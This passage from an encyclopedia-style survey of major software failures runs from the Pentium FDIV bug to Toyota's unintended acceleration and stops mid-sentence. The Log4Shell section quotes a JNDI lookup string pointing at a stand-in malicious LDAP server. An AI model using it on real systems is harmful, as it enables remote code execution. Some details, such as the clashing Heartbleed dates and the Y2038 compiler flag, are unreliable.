The Pentium FDIV bug was a defect in the floating-point unit (FPU) of early Intel Pentium (P5) microprocessors, resulting in inaccurate double-precision floating-point division results for specific input pairs.[12] The error manifested in approximately 1 in 9 billion random divisions, with inaccuracies typically appearing from the 14th to 23rd significant bits, though it could propagate in iterative or non-random computations such as those involving small "bruised" integers.[13] Affected processors were those produced before late 1994; Intel incorporated a hardware fix in subsequent revisions by adding transistors to the lookup table circuitry.[14] The bug originated in the FPU's implementation of the base-4 SRT (Sweeney, Robertson, and Tocher) division algorithm, which relied on a 2048-entry programmable logic array (PLA) lookup table to select quotient digits (±2, ±1, or 0) based on chopped mantissas of the dividend and divisor.[12] A design error caused five critical entries to be omitted from this table—specifically, due to the top threshold for the +2 quotient region being set incorrectly low (to 0 instead of 2)—triggering erroneous quotient estimates for divisors whose normalized mantissas exhibited certain patterns, such as six consecutive 1s in specific bit positions.[13] Intel attributed the omission to a scripting mistake during table generation, but die-level analysis revealed a underlying mathematical flaw in the table's boundary definitions, with 16 entries total omitted (11 harmless).[12] Mathematician Thomas R. Nicely discovered the issue in June 1994 while performing computations on twin primes and other number-theoretic problems using Lynchburg College's three Pentium-equipped computers, initially suspecting software before isolating it to the hardware by October.[14] He observed discrepancies in the ninth decimal place of division results, such as erroneous outputs from operations like 4,195,835 / 3,145,727, and publicly disclosed findings via Internet forums after Intel's delayed confirmation.[14] Intel had identified the flaw internally by June 1994 and silently corrected it in chips shipped from September onward, but withheld public notice, prompting criticism for understating its relevance to scientific users.[14] Facing escalating media scrutiny and demands from affected customers, Intel shifted from requiring proof of impact for replacements to offering free exchanges for all pre-fixation Pentiums on December 20, 1994, marking the company's first major CPU recall.[15] No software workaround existed, as the table resided in fixed hardware logic rather than updatable microcode.[15] The episode incurred $475 million in costs for Intel, primarily from replacements and lost credibility, though it caused no broader financial market disruptions or safety incidents.[15] It highlighted vulnerabilities in automated hardware design tools and lookup-table verification, influencing subsequent processor validation processes.[12]Knight Capital Group Trading Glitch (2012)
On August 1, 2012, Knight Capital Americas LLC, a major high-frequency trading firm and market maker, experienced a catastrophic software malfunction in its Smart Market Access Routing System (SMARS) during the deployment of new code to support the New York Stock Exchange's supplemental liquidity provider pilot program.[16] The error activated dormant, repurposed code from an older trading strategy called Power Peg, which had not been fully disabled or tested in the production environment.[17] This led to the automated system generating and executing millions of unintended orders, primarily buying shares at inflated prices and selling at depressed ones, without corresponding customer orders or risk management overrides.[16] The glitch unfolded over approximately 45 minutes starting around 9:15 a.m. ET, during which SMARS executed over 4 million trades across 148 NYSE-listed stocks, accumulating long positions worth about $7 billion before partial unwinding.[17] Knight ultimately realized a $440 million net trading loss after liquidating the erroneous positions later that day, representing nearly all of its capital at the time.[18] The firm's shares plummeted 75% in value, closing at $2.58 from an opening of $10.29, triggering a near-collapse that required emergency capital infusion.[16] The root cause stemmed from two key failures identified by the U.S. Securities and Exchange Commission (SEC): first, Knight reused untested source code from the defunct Power Peg system without adequately validating its integration into the new SMARS module, including overlooking a critical flag set to "1" (active) instead of "0" (inactive), which triggered rogue order routing logic; second, the firm lacked sufficient pre-trade controls for its sponsored access arrangements, allowing the erroneous orders to flood exchanges unchecked.[17] Knight's internal testing in a simulated environment failed to replicate the production scenario, as it did not account for the specific sequence of incoming customer orders that activated the bug.[16] No evidence of intentional misconduct was found, but the incident exposed vulnerabilities in rapid software deployment practices within automated trading systems.[17] In the aftermath, Knight survived short-term through a $400 million bailout from investors but was acquired by Getco LLC (now part of KCG Holdings) in a deal valuing the firm at $1.4 billion, effectively marking its operational demise as an independent entity.[16] The SEC charged Knight with violations of Rule 15c3-5 under the Securities Exchange Act of 1934 for inadequate risk management controls over market access, imposing a $12 million civil penalty—the largest such fine at the time—and mandating enhanced compliance measures.[17] The event prompted regulatory scrutiny of high-frequency trading firms, highlighting the systemic risks of unproven code in financial markets, though no broader market disruption occurred due to the self-contained nature of the losses.[16]2010 Flash Crash
On May 6, 2010, the U.S. equity markets experienced a sudden and severe decline known as the Flash Crash, with the Dow Jones Industrial Average plummeting approximately 1,000 points (about 9%) between 2:32 p.m. and 2:47 p.m. EDT before recovering most losses by the end of the trading day.[19] [20] The event erased and then restored over $1 trillion in market value within minutes, involving nearly 2 billion shares traded in equities between 2:40 p.m. and 3:00 p.m., far exceeding normal volumes.[19] More than 20,000 trades across over 300 securities executed at prices at least 60% away from pre-crash values, including anomalous prices like $0.01 per share for some stocks, prompting subsequent cancellations of trades deemed erroneous.[19] [20] The primary trigger was an automated trading algorithm employed by a large mutual fund to execute a sell order for 75,000 E-Mini S&P 500 futures contracts, valued at roughly $4.1 billion, initiated at 2:32 p.m. EDT on the Chicago Mercantile Exchange.[19] This algorithm was programmed to sell aggressively by targeting 9% of the volume from the previous minute, without incorporating constraints on price or time, resulting in the full execution within 20 minutes amid thinning liquidity.[19] The design flaw in this execution strategy—prioritizing volume over market impact—generated disproportionate sell pressure, as the algorithm continued selling into a declining market without adaptive pauses or price sensitivity.[19] High-frequency trading (HFT) firms, which accounted for about 50% of trading volume during the episode, initially absorbed the sales but then rapidly sold positions, engaging in "hot-potato" volume where contracts were passed between traders with minimal net change in ownership, further eroding liquidity.[19] Interactions among automated systems amplified the disruption: between 2:45:13 p.m. and 2:45:27 p.m., buy-side liquidity in E-Mini futures dropped to $58 million, less than 1% of morning levels, as HFT algorithms withdrew amid extreme volatility and some proprietary systems halted trading due to predefined risk thresholds triggered by rapid price swings.[19] In equities, similar dynamics led to reliance on stub quotes (distant placeholder bids/offers) when genuine liquidity vanished, executing trades at irrationally low prices.[19] [20] The joint investigation by the U.S. Securities and Exchange Commission (SEC) and Commodity Futures Trading Commission (CFTC) concluded that while no single software coding error caused the crash, the confluence of the flawed sell algorithm and HFT behaviors—neither of which deviated from their programmed logic—exposed vulnerabilities in automated market structures reliant on rapid, high-volume electronic execution.[19] In response, regulators implemented circuit breakers, including single-stock pauses and market-wide limits, to curb similar cascades from algorithmic interactions.[19] The episode highlighted how algorithm design lacking robustness to feedback loops could propagate shocks across interconnected futures and cash markets, though subsequent analyses affirmed that HFT firms did not initiate the decline but contributed through liquidity provision patterns that prioritized immediacy over stability during stress.[19]Space and Aerospace Failures
Ariane 5 Rocket Explosion (1996)
The maiden flight of the Ariane 5 rocket, designated Flight 501, launched on June 4, 1996, at 09:33:59 local time from Kourou, French Guiana, carrying a cluster of four satellites valued at approximately 500 million euros. Approximately 37 seconds after main engine ignition—equivalent to about 40 seconds into the flight—the rocket deviated from its trajectory at an altitude of around 3,700 meters, leading to structural breakup and explosion; the onboard self-destruct system activated shortly thereafter, scattering debris over an area of 12 square kilometers.[21][22] The root cause was a software fault in the Inertial Reference System (SRI), which provided guidance and attitude data to the flight control systems. The SRI software, reused from the Ariane 4 without full adaptation to the Ariane 5's steeper ascent trajectory, executed an unnecessary alignment function that processed the horizontal velocity component (designated BH). This 64-bit floating-point value exceeded the range assumable for conversion to a 16-bit signed integer, triggering an operand error and unhandled exception that caused the active SRI processor to shut down at H0 + 36.7 seconds.[22][23] The backup SRI, operating in cold redundancy but synchronized with the primary, encountered the identical fault and also failed, resulting in total loss of guidance data and handover to the operations computer, which could not compensate.[22] This overflow stemmed from inadequate specification of Ariane 5 trajectory parameters in the SRI design and absence of range checks or exception handling for such values, despite prior assumptions of safety margins derived from Ariane 4 data.[21][23] Testing failures contributed, as simulations and reviews relied on Ariane 4 profiles and excluded Ariane 5-specific conditions due to schedule pressures, failing to expose the vulnerability despite the software's proven reliability in prior missions.[23] The inquiry board, reporting on July 19, 1996, attributed the catastrophe to systemic deficiencies in software engineering, including incomplete requirements capture, design errors, and insufficient validation, rather than isolated coding mistakes.[22] In response, the European Space Agency corrected the SRI software by disabling the offending function, adding protections against overflows, and revising qualification processes to incorporate full-system simulations with Ariane 5 parameters. Subsequent flights, starting with Flight 502 in November 1996, incorporated these fixes, enabling Ariane 5's operational success, though the incident underscored the risks of software reuse without rigorous environmental revalidation in safety-critical systems.[21][22]Mars Climate Orbiter Loss (1999)
The Mars Climate Orbiter (MCO), a NASA unmanned spacecraft, launched aboard a Delta II rocket from Cape Canaveral on December 11, 1998, as part of the Mars Surveyor '98 program.[24] Its primary objectives included mapping the Martian surface, monitoring daily and seasonally varying atmospheric dust and water vapor patterns to study climate dynamics, and serving as a communications relay for the Mars Polar Lander.[24] The 638-kilogram probe traveled approximately 669 million kilometers over nine months before attempting orbital insertion around Mars.[25] Contact with the spacecraft was lost on September 23, 1999, at 09:04 UTC during the planned Mars orbit insertion burn, when it passed behind the planet relative to Earth.[24] Post-loss analysis by NASA's Mishap Investigation Board determined that the orbiter had entered the Martian atmosphere at an altitude of about 57 kilometers—far below the targeted periapsis of 140 to 150 kilometers—causing aerodynamic forces to destroy it.[24] Trajectory reconstruction revealed an unexpectedly high spacecraft velocity change of 64.1 meters per second, compared to the pre-insertion estimate of 50 meters per second, confirming the low-altitude entry.[26] The root cause was a discrepancy in measurement units within the navigation software interface between ground-based systems and the flight software. Specifically, the "SM_FORCES" module in Lockheed Martin's ground software generated outputs for small thruster firings in English units of pound-force seconds (lbf·s), while the spacecraft's navigation software, per the Software Interface Specification, expected metric units of newton-seconds (N·s).[24] This mismatch introduced a systematic error factor of 4.45 (since 1 lbf ≈ 4.45 N), leading to underestimation of velocity perturbations from attitude control thrusters, which accumulated over the mission and corrupted the predicted orbit.[24] The error originated in the ground software's failure to convert units, despite NASA specifying metric standards, and was exacerbated by the thruster firings being classified as non-critical trajectory inputs, evading rigorous validation.[24] Contributing factors included inadequate systems engineering oversight, with insufficient end-to-end testing of the small-forces model against flight software, and poor communication between the navigation team—unfamiliar with the spacecraft's configuration—and the software developers.[24] A planned Trajectory Correction Maneuver (TCM-5) was skipped due to time constraints, further masking the accumulating discrepancy.[24] The mission's total cost was approximately $327 million, encompassing development, launch, and operations, though the spacecraft itself was valued at $125 million.[27] [25] The investigation board issued recommendations emphasizing unit consistency verification in all software interfaces, independent audits of critical navigation code, and enhanced training on systems integration to prevent similar failures in future missions.[24] This incident underscored the causal role of precise unit handling in software for space navigation, where even small modeling errors can propagate to mission-ending deviations without robust validation protocols.[24]Infrastructure and Utilities
Northeast Blackout of 2003
The Northeast Blackout of 2003 occurred on August 14, 2003, disrupting electrical service to approximately 50 million people across eight U.S. states and Ontario, Canada, with outages lasting from hours to two days in affected areas.[28] The initiating events involved high-voltage transmission lines in northeastern Ohio, operated by FirstEnergy Corporation, sagging under heavy load and contacting overgrown trees, causing three 345 kV lines to trip sequentially between 3:05 p.m. and 3:41 p.m. EDT.[28] These failures overloaded adjacent lines, leading to a cascading separation of the power grid that removed over 61,800 megawatts of load.[28] A key contributing factor was a software defect in FirstEnergy's energy management system (EMS), the GE XA/21, which handled monitoring, alarms, and event logging.[29] The bug manifested as a race condition in the Unix-based alarm and event processor: when confronted with a high volume of simultaneous events—such as the rapid influx from line trips—the system entered an infinite loop while attempting to write log entries to a circular buffer, causing the alarm function to fail silently without notifying operators or triggering backups.[29][30] This rendered control room personnel unaware of the escalating grid instability for over an hour, delaying remedial actions like load shedding or line reconfiguration.[31] The U.S.-Canada Power System Outage Task Force's final report identified inadequate vegetation management, operator training deficiencies, and reliability coordination failures as primary causes, but subsequent analysis by GE Energy confirmed the EMS software flaw as the reason for the unalarmed state, exacerbating the cascade.[28][31] GE issued patches for the XA/21 systems in use by multiple utilities, and the incident prompted mandatory reliability standards under the North American Electric Reliability Corporation, including enhanced EMS redundancy and software validation.[31] Economic impacts were estimated at $6 billion to $10 billion, including lost productivity, spoiled goods, and emergency response costs.[29]Ukraine Power Grid Attack (2015, software component)
The 2015 cyber attack on Ukraine's power grid, occurring on December 23, targeted three regional electric distribution companies—Prykarpattyaoblenergo, Kyivoblenergo, and possibly others—resulting in outages affecting approximately 230,000 customers for durations of 1 to 6 hours. Attackers, attributed by cybersecurity analyses to the Russian-linked Sandworm group, exploited software vulnerabilities and deployed custom malware to gain persistent access to corporate IT networks, which were inadequately segmented from operational technology (OT) systems controlling substations. Initial compromise began in spring 2015 through spear-phishing campaigns delivering BlackEnergy version 3 malware via malicious Microsoft Office attachments, such as Excel files with embedded macros that executed upon user interaction.[32][33][34] BlackEnergy, a modular information-stealing Trojan originally developed for DDoS and espionage, served as the primary backdoor in the attack, enabling remote command-and-control (C2) communications, credential harvesting, and lateral movement across Windows-based systems. Its plugin architecture allowed customization for industrial targets, including modules for keylogging and data exfiltration, which attackers used to map networks and escalate privileges over months of reconnaissance. Once inside, intruders pivoted to OT environments via infected jump servers and VPN connections, leveraging weak or default credentials to access human-machine interfaces (HMIs) connected to supervisory control and data acquisition (SCADA) systems from vendors like Siemens SIPROTEC. No zero-day exploits in core grid software were reported; instead, the attack capitalized on unpatched Windows vulnerabilities, insecure remote access protocols (e.g., lacking multifactor authentication), and flat network designs that permitted IT-to-OT traversal without air-gapping or anomaly detection.[35][36][37] During the disruption phase, attackers manually issued commands from external locations to open circuit breakers at 11 substations, simulating operator actions through compromised HMIs while suppressing alarms to delay detection. Concurrently, they deployed KillDisk—a destructive wiper malware variant—to overwrite master boot records (MBRs) on infected workstations, erasing logs and hindering forensic recovery and system restoration; this component targeted both IT and select OT endpoints but spared primary control servers to maintain operational access. Post-attack, wipers like KillDisk were analyzed as extensions of BlackEnergy campaigns, with code similarities indicating shared development by state-affiliated actors. The software's efficacy stemmed from its adaptability to legacy ICS protocols rather than novel bugs, underscoring systemic flaws in utility software configurations, such as outdated operating systems (e.g., Windows XP) and absent endpoint protection tailored for air-gapped environments.[38][39][32] Recovery relied on manual interventions, including on-site technician overrides of breakers and clean-room rebuilds of wiped systems, highlighting the absence of resilient software redundancies like immutable backups or behavioral monitoring in the targeted environments. Technical reports from joint industry analyses emphasized that the attack's success derived from cascading software weaknesses—phishing-vulnerable email clients, credential-storing applications without encryption, and SCADA interfaces exposing control logic—rather than a singular bug, though BlackEnergy's evasion of antivirus via packed executables amplified persistence. Subsequent U.S. government alerts classified these tactics as indicative of advanced persistent threats (APTs) targeting critical infrastructure, prompting recommendations for micro-segmentation and protocol whitelisting in ICS software stacks.[33][40][32]Date and Time Handling
Year 2000 (Y2K) Problem
The Year 2000 (Y2K) problem stemmed from the widespread use of two-digit representations for years in computer software and firmware, a practice originating in the 1960s and 1970s to conserve limited storage space in early systems. This convention encoded years like 1999 as "99," but upon reaching "00" on January 1, 2000, many programs incorrectly interpreted it as 1900, potentially causing failures in date-dependent calculations such as eligibility determinations, financial accruals, and chronological sorting. The issue affected legacy mainframe applications written in languages like COBOL, as well as embedded systems in devices ranging from elevators to nuclear plant controls, with risks cascading through interconnected infrastructures like power grids and banking networks.[41][42] Remediation strategies included date expansion, which converted all two-digit years to four digits for a permanent fix, though it was labor-intensive and costly; and windowing, a temporary workaround assuming two-digit years within a sliding 100-year band (e.g., 00–49 as 2000–2049, 50–99 as 1950–1999) to extend functionality for decades without full rewrites. Governments and corporations undertook extensive inventories, testing, and upgrades, with the U.S. federal government allocating approximately $8.7 billion by mid-1999, including over $3 billion spent through fiscal year 1998 across major agencies. Private sector expenditures were substantial, with estimates for U.S. businesses around $50 billion and global totals reaching $300–600 billion, exemplified by investments from firms like General Motors ($565 million) and Citicorp ($600 million). These efforts involved compliance acts, such as the U.S. Year 2000 Information and Readiness Disclosure Act of 1998, to facilitate information sharing and liability protections.[43][44][45][41] The transition on January 1, 2000, resulted in minimal disruptions, with no widespread systemic failures reported in critical infrastructures despite pre-rollover simulations revealing errors in unremediated code. Isolated incidents occurred, such as minor glitches in some Japanese vending machines and European billing systems, but these were quickly resolved without broader economic or safety impacts. The absence of catastrophe is attributable to proactive global remediation, which addressed vulnerabilities in over 99% of U.S. federal mission-critical systems by late 1999, rather than inherent overhyping, as evidenced by documented test failures in legacy environments prior to fixes. Post-event analyses confirmed that without these interventions, date miscalculations could have triggered real operational breakdowns in sectors reliant on precise chronology.[41][44]Unix Millennium Bug (2038 Problem)
The Unix Millennium Bug, commonly referred to as the Year 2038 problem or Y2038, stems from the representation of time in many Unix-like operating systems and software using a 32-bit signed integer for thetime_t data type, which tracks seconds elapsed since the Unix epoch of January 1, 1970, 00:00:00 UTC.[46] This integer's maximum value of 2,147,483,647 seconds—equivalent to 2³¹ - 1—will be reached at 03:14:07 UTC on January 19, 2038, after which any increment causes an overflow, wrapping the value to a negative number starting at -2,147,483,648.[47] Systems interpreting this negative value as seconds before the epoch will display or process dates regressing to December 13, 1901, 20:45:52 UTC, potentially disrupting timestamp-dependent operations such as file systems, databases, logging, and scheduling.[48]
The root cause lies in the historical choice of a 32-bit time_t in the C programming language standard, adopted by POSIX for portability across Unix variants, which sufficed for systems designed in the 1970s when 68 years of runtime was deemed ample.[46] This limitation primarily impacts 32-bit architectures, embedded devices, and legacy applications that have not migrated to 64-bit time representations, as 64-bit systems typically employ a 64-bit time_t capable of handling timestamps until approximately year 292 billion.[49] Consequences could include software failures like incorrect date validations, corrupted backups, or halted processes in uninterruptible power supplies, medical equipment, or industrial controls relying on absolute time, though the scope is narrower than the Y2K issue due to fewer affected 32-bit deployments in 2038.[50]
Mitigation strategies involve recompiling software with 64-bit time_t support, where available in libraries like glibc since version 2.34 (2021), or adopting alternative time APIs such as struct timespec with nanosecond precision.[49] Operating systems like Linux on 64-bit processors have been largely immune since their inception, as they default to 64-bit integers, but cross-compilation for 32-bit targets requires explicit flags like -D_FILE_OFFSET_BITS=64.[48] Efforts by bodies like the Linux Foundation and vendors such as Wind River have focused on auditing and patching embedded firmware, with tools for static analysis detecting vulnerable code patterns; however, billions of IoT and legacy devices may remain unpatched, risking isolated failures rather than systemic collapse.[50] As of 2025, awareness has prompted proactive updates in major distributions, reducing anticipated impact compared to unaddressed scenarios.[49]
Security and Encryption Flaws
Heartbleed Bug (2014)
The Heartbleed bug, designated CVE-2014-0160, was a critical buffer over-read vulnerability in the OpenSSL cryptographic software library, enabling remote attackers to extract sensitive data from the memory of affected systems.[51] It stemmed from a flaw in the implementation of the heartbeat extension for TLS and DTLS protocols, where a missing bounds check allowed malicious packets to trigger the return of up to 64 kilobytes of process memory per request, potentially disclosing private keys, usernames, passwords, cookies, and other confidential information without detection or server logs.[52] [53] The bug affected OpenSSL versions 1.0.1 through 1.0.1f, released between March 14, 2010, and March 25, 2014, while earlier stable branches like 1.0.0 and 0.9.8 remained unaffected due to lacking the heartbeat feature.[54] Discovered independently in early April 2014, the vulnerability was identified on April 1 by Google's security engineer Neel Mehta and around April 3 by researchers at Codenomicon Defense (Riku Salomaa, Antti Tikkanen, and Matti Nikander), who coordinated disclosure with the OpenSSL Project.[54] Mehta reported the issue privately to OpenSSL on April 7, prompting the immediate release of version 1.0.1g as a patch that day, which added the necessary bounds validation to prevent memory leaks.[53] The bug's existence dated back to the introduction of the heartbeat extension in OpenSSL 1.0.1, released on March 14, 2012, representing a single off-by-one error in bounds checking that evaded code review due to OpenSSL's under-resourced development team, which operated on a volunteer basis with limited funding.[51] The impact was widespread, as OpenSSL powered approximately two-thirds of secure web servers at the time, with a Netcraft survey in April 2014 indicating over 66% of active HTTPS sites on Apache and nginx servers were vulnerable.[55] Attackers could repeatedly exploit it to harvest data, compromising encryption integrity and enabling man-in-the-middle attacks, though no evidence emerged of mass pre-disclosure exploitation by state actors despite speculation; post-disclosure scans revealed persistent unpatched systems for years.[52] Remediation required not only patching OpenSSL but also revoking and regenerating affected private keys and certificates, as leaked keys rendered prior and subsequent sessions insecure, affecting millions of users and organizations including major services like Yahoo and Flickr.[53] Exploitation relied on crafting heartbeat response packets with falsified payload lengths, tricking the server into echoing uninitialized memory contents back to the attacker, who could chain requests to map larger memory regions over time.[51] This memory disclosure occurred silently, bypassing typical security logging, and was rated CVSS 5.0 for low complexity and no privileges required, underscoring OpenSSL's role as a de facto standard despite its maintenance challenges.[56] The incident highlighted systemic risks in open-source cryptography libraries, prompting increased funding for OpenSSL via initiatives like the Linux Foundation's Core Infrastructure Initiative, though adoption of alternatives like LibreSSL gained limited traction.[54]Log4Shell Vulnerability (2021)
The Log4Shell vulnerability, designated CVE-2021-44228, is a remote code execution flaw in the Apache Log4j 2 logging library for Java applications, affecting versions from 2.0-beta9 through 2.14.1.[57] This library, used extensively in enterprise software, cloud services, and web applications for logging events, enables attackers to execute arbitrary code on vulnerable servers when untrusted input is logged.[58] The issue stems from Log4j's default configuration performing Java Naming and Directory Interface (JNDI) lookups on specially crafted log messages containing lookup patterns like${jndi:ldap://malicious-server/a}, which trigger remote resource fetching and deserialization leading to code execution.[59] With a CVSS v3.1 base score of 10.0, it represents one of the most severe software vulnerabilities due to its ease of exploitation and broad applicability across platforms.[57]
The vulnerability was privately reported to Apache in late November 2021, with MITRE assigning the CVE identifier on November 26.[60] Public disclosure occurred on December 9, 2021, coinciding with immediate exploitation attempts observed in the wild by security researchers.[61] Apache responded by releasing version 2.15.0 on December 6 as an initial patch, which disabled JNDI lookups but proved insufficient against variants, prompting further updates including 2.16.0 on December 13 and 2.17.0 on December 28 for comprehensive remediation via configuration changes and removal of the vulnerable MessageLookup class.[62] U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued alerts on December 10, urging immediate scanning and patching, while noting active exploitation by state-sponsored actors and cybercriminals.[58]
Exploitation requires no authentication and leverages common logging of user inputs, such as usernames or HTTP headers, making it trivially achievable via tools like crafted payloads in protocols including LDAP, RMI, or DNS.[63] Attackers could deploy malware, ransomware, or backdoors, with real-world incidents including compromises of Minecraft servers, cloud infrastructure, and corporate networks shortly after disclosure.[64] Affected systems spanned millions of Java-based applications, from on-premises servers to services like Apple iCloud, Steam, and various AWS components, amplifying supply-chain risks due to Log4j's ubiquity in dependencies.[65]
Remediation efforts emphasized upgrading to Log4j 2.17.1 or later, setting system properties like log4j2.formatMsgNoLookups=true, and implementing network blocks on outbound JNDI traffic, though legacy systems and embedded devices posed patching challenges.[66] Follow-on vulnerabilities like CVE-2021-45046 (DoS in 2.16.0) underscored incomplete initial fixes, leading to coordinated vulnerability disclosures and tools for detection via signature-based scans.[62] As of 2024, residual unpatched instances persist in approximately 12% of scanned Java applications, highlighting ongoing risks from delayed updates in complex ecosystems.[67] The incident exposed systemic issues in open-source dependency management, prompting enhanced scrutiny of logging libraries and automated patching in software supply chains.[68]
Enterprise and Cloud Computing
CrowdStrike Falcon Sensor Update Failure (2024)
The CrowdStrike Falcon sensor update failure occurred on July 19, 2024, when a defective configuration file in a rapid response content update for the Falcon endpoint detection and response (EDR) software caused widespread crashes on Microsoft Windows systems. The update, deployed at 04:09 UTC, affected Windows hosts running Falcon sensor version 7.11 or later that were online during a brief window until its reversion at 05:27 UTC. Microsoft estimated that approximately 8.5 million Windows devices were impacted, representing less than 1% of all Windows machines globally but concentrated in enterprise environments due to Falcon's primary use by organizations. macOS and Linux systems were unaffected, as the sensor implementation differed.[69][70] The root cause was a logic error in the Falcon sensor's Content Interpreter module within the Windows kernel driver (csagent.sys), where an out-of-bounds memory read occurred during processing of channel file 291. This file, part of the update for detecting Falcon malware, contained non-wildcard criteria that referenced a 21st input parameter in the IPC Template Type, but the sensor code provided only 20 inputs, leading to an unhandled exception and blue screen of death (BSOD) crashes. The defect originated from inadequate validation in the content deployment pipeline: the Content Validator tool failed to detect the mismatch, as it lacked runtime bounds checking and relied on assumptions about input fields without compile-time enforcement. Testing had covered wildcard scenarios but not the specific non-wildcard conditions that triggered the bug, exposing a gap in test coverage for edge cases in the sensor's interpretation logic.[71][70] Recovery required manual intervention, as the crashes prevented remote fixes; affected systems had to be booted into Windows Recovery Environment or safe mode to delete the faulty file (C-00000291*.sys) from the CrowdStrike directory. CrowdStrike issued technical guidance within hours, and collaborated with Microsoft to develop automated remediation tools for cloud environments like Azure. By July 29, 2024, approximately 99% of affected sensors had recovered to pre-incident levels. The incident disrupted critical sectors: airlines such as Delta Air Lines canceled over 3,500 flights and incurred costs exceeding $500 million; healthcare providers faced emergency system outages; and financial services experienced payment processing delays. Economic analyses estimated direct losses to Fortune 500 companies at $5.4 billion, with broader global impacts in the tens of billions, though exact figures vary due to indirect effects like productivity halts.[70][69][72] In response, CrowdStrike's root cause analysis identified systemic issues, including over-reliance on a single validation stage and absence of staged rollouts for content updates. Remediation included adding compile-time input validation (deployed July 27, 2024), runtime bounds checks, expanded fuzzing and fault injection testing for non-wildcard scenarios, and mechanisms for customer-controlled update pacing. The event prompted regulatory scrutiny, including a U.S. Senate hearing on July 24, 2024, and multiple class-action lawsuits alleging negligence in testing. It underscored risks in third-party kernel-level software dependencies, where a single vendor's update can cascade failures across interconnected enterprise ecosystems without built-in safeguards like diversified EDR usage or offline validation.[71]Telecommunications and Networking
AT&T Network Outage (1990)
The AT&T network outage occurred on January 15, 1990, beginning at 2:25 p.m. EST, when a trunk interface unit in a Manhattan switching center experienced a hardware fault during routine operations.[73] This triggered the system's recovery procedures across AT&T's long-distance network, which handled approximately 70% of U.S. long-distance traffic at the time.[74] Within minutes, the failure cascaded, disabling half of the network's 114 electronic switches and blocking over 50 million calls during the nine-hour disruption that ended around 11:30 p.m.[74] The incident resulted in an estimated $60 million loss in unconnected calls for AT&T, with broader economic ripple effects including delayed airline flights and disrupted business operations.[74] [75] The root cause was a single-line software bug introduced in a mid-December 1989 update to the recovery code for the 4ESS switches, written in C.[74] Specifically, the bug involved abreak statement in an else clause within a switch statement's case handling for error recovery; when two call-related messages arrived within 1/100th of a second, the break caused the program to exit the case prematurely, skipping essential data restoration and instead overwriting critical parameters.[74] [73] This led to improper switch resets, where affected switches dumped active calls and flooded adjacent switches with error notifications and backlogged traffic, initiating an iterative failure loop across the interconnected network despite built-in self-healing mechanisms.[74]
Engineers at AT&T's network operations centers identified the flaw by analyzing logs and reverted the switches to the prior software version, stabilizing the system.[73] Initial suspicions of sabotage or hacking delayed diagnosis, as the uniform failure pattern across geographically dispersed switches suggested external interference, but internal audits confirmed the software error.[73] The outage exposed vulnerabilities in large-scale distributed systems, where localized faults could propagate globally due to tight coupling and inadequate simulation of rare timing conditions during testing.[74] AT&T subsequently enhanced code review processes and fault isolation, though the event underscored the challenges of ensuring robustness in complex telecommunications infrastructure reliant on unproven software changes.[74]
Signaling System 7 Vulnerabilities
The Signaling System 7 (SS7) protocol suite governs signaling in global telecommunications networks for functions such as call routing, SMS delivery, and mobile roaming, and was originally specified in the 1980s by the International Telecommunication Union for use in trusted, closed carrier environments lacking modern security protocols like mutual authentication or encryption.[76] This foundational design assumption—pre-dating widespread internet interconnectivity—enables attackers with SS7 network access, often obtained via compromised or rogue telecom operators, to impersonate legitimate nodes and issue unauthorized queries or redirects without detection.[77] Public awareness of these flaws emerged in 2008 through initial security research presentations, with systematic demonstrations beginning around 2010 by firms like Security Research Labs (SRLabs).[78] By 2014, German researcher Karsten Nohl publicly showcased live exploits at hacker conferences, including tracking mobile locations and intercepting communications, highlighting how SS7's trust-based architecture permits global-scale abuse without user consent or awareness.[79] Key vulnerabilities stem from exploitable SS7 message types, such as MAP (Mobile Application Part) operations, which allow:- Location tracking: Attackers query a target's position via commands like SendRoutingInfoForSM or AnyTimeInterrogation (ATI), achieving accuracy to within a cell tower's range (often hundreds of meters in urban areas), as demonstrated in SRLabs tests on European networks in 2014–2016.[80][77]
- Call and SMS interception: By inserting themselves as a man-in-the-middle using UpdateLocation or InsertSubscriberData, intruders can eavesdrop on voice traffic or divert SMS, including two-factor authentication codes, bypassing end-to-end encryption in apps like WhatsApp if reliant on SMS fallback.[81]
- Fraud and denial-of-service: Manipulation of subscriber data enables call forwarding to attacker-controlled numbers or subscription changes, facilitating financial theft; for instance, in May 2017, hackers exploited SS7 to intercept German bank SMS verifications, draining accounts in real-time operations traced to organized crime groups.[81]
Transportation Systems
Toyota Unintended Acceleration (2009-2010)
The Toyota unintended acceleration incidents, peaking in 2009-2010, involved numerous reports of vehicles suddenly accelerating without driver input, primarily in models equipped with the Electronic Throttle Control System with intelligence (ETCS-i), a drive-by-wire system introduced in various Toyota and Lexus models since the early 2000s. By late 2009, the National Highway Traffic Safety Administration (NHTSA) had received over 2,000 complaints alleging sudden unintended acceleration (SUA), linked to at least 21 deaths and hundreds of injuries across models like the Camry, Prius, and Avalon.[85] Toyota responded with massive recalls totaling nearly 8 million vehicles in the United States: in November 2009, 2.3 million for floor mats that could trap the accelerator pedal; and in January 2010, another 2.3 million for sticky accelerator pedals that might bind due to friction or wear.[85] These mechanical issues were identified as potential contributors, but allegations persisted that ETCS-i software flaws could independently cause throttle valves to open fully, overriding driver commands.[86] NHTSA launched a formal defects investigation in September 2009, expanding it to include electronic systems amid congressional scrutiny and high-profile crashes, such as an August 2009 Lexus ES 350 collision on a California highway that killed four, including a state police officer.[85] To assess ETCS-i, NHTSA contracted NASA engineers, who conducted extensive testing on vehicle components, software simulations, and electromagnetic interference scenarios from February 2010 to late 2010. The resulting February 2011 report concluded there were no electronic defects or software vulnerabilities capable of producing the large throttle openings (near 100%) required for high-speed SUA incidents; instead, event data recorder (EDR) analyses from crash-involved vehicles consistently showed the accelerator pedal depressed while brakes were not, pointing to driver pedal misapplication under stress.[86][85] NHTSA endorsed these findings, attributing most verified SUA cases to human error or the recalled mechanical defects, and closed the probe without mandating electronic fixes.[87] Debate over ETCS-i software persisted, fueled by independent analyses criticizing its design for lacking redundancy—unlike mechanical linkages in older systems—and exhibiting poor code quality, such as unhandled error conditions and reliance on single microprocessors without fail-safes to default to idle.[88] Software expert Michael Barr, in a 2013 court testimony for an Oklahoma wrongful-death suit stemming from a 2009 crash, identified specific bugs in Toyota's source code, including race conditions and memory management flaws, leading a jury to award $1.5 million against Toyota on grounds of defective firmware contributing to unintended throttle activation.[89] A 2002 internal Toyota memo, translated and revealed in 2012, documented engineers observing full-throttle acceleration in a pre-production test due to a software anomaly, though Toyota deemed it non-reproducible in production.[90] Toyota settled over 500 SUA claims post-2014 for $1.2 billion in a deferred prosecution agreement with 